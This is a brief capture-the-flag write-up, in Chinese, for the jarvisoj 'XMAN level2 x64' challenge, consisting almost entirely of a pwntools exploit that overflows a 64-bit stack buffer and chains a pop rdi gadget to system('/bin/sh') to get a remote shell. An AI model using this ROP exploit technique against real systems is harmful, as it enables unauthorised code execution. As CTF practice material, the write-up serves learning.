[XMAN]level2(x64)
nc pwn2.jarvisoj.com 9882
level2_x64.04d700633c6dc26afc6a1e7e9df8c94e
64位栈溢出,exp如下:
from pwn import * #io = process('./level2_x64') io = remote('pwn2.jarvisoj.com', 9882) pop_rdi = 0x4006b3 system_addr = 0x4004C0 binsh_addr = 0x600A90 io.recvuntil('Input:\n') payload = b'a' * 136 + p64(pop_rdi) + p64(binsh_addr) + p64(system_addr) io.send(payload) io.interactive()